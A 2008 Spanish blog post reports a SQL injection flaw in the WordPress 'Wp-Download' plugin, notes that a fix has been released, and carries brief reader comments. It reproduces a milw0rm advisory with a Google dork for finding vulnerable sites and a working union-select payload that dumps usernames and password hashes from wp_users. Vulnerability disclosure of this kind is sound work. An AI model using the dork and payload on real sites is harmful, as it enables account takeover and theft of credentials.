Vulnerabilidad afecta un Plugin de Wordpress

Recien me encuentro con una vulnerabilidad en un Plugin de Wordpress y considero importante por el echo que es de uso bastante masivo ya que lo he visto por varios Lados, consiste en una Inyección Sql en el Plugin “Wp-Download“, aunque no se informó la Url del Autor, supongo que es esta.

Algun Kaker Atacante, puede Explotar la vulnerabilidad Facilmente.

Aca el Informe:

###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################

# milw0rm.com [2008-03-31]


Actualización:


El autor del Plugin ya Liberó una Nueva Versión que arregla el Bug de la Inyeccion Sql.


	
Entradas que tal vez tengan relación:


	

			
	
	
		

			

				
31 March 2008 · Archivado En Vulnerabilidades

			

			

							

		

		
		

	
		
	
        
Comentarios

	




	
4 Comentarios a “Vulnerabilidad afecta un Plugin de Wordpress”


	
    

	
		
  1. 
			Public Enemy El
						31st March 2008 2:41 pm 
			
    
			
    Por eso siempre trato de usar el menor número posible de plugins y cuando uso uno, procuro que sea muy popular y que su autor lo actualice con frecuencia. Saludos.
    
			
    

		
    2. 

	
	
		
  2. 
			Que me pareció interesante en esta semana | Hernan Davos El
						31st March 2008 9:20 pm 
			
    
			
    [...] premios para todos los “photoshoperos”. Layouts para tu web de 750px y 950 px en css. Vulnerabilidad afecta un Plugin de Wordpress Showthatportfolio - Crear porfolios [...]
    
			
    

		
    3. 

	
	
		
  3. 
			exactlimon El
						31st March 2008 9:46 pm 
			
    
			
    saludos nery hice un post en mi blog sobre este tema, saludos
    
			
    

		
    4. 

	
	
		
  4. 
			el mundo de Exactlimon » vulnerabilidad en un plugin de wordpress El
						1st April 2008 2:21 am 
			
    
			
    [...] hoy mediante el blog de mi amigo neri [...]
    
			
    

		
    5. 

	
	
	


 



Dejar un Comentario
Nota: Los comentarios nunca Serán Borrados, podés estar de acuerdo o plantear una idea Diferente, pero por favor, Con respeto :D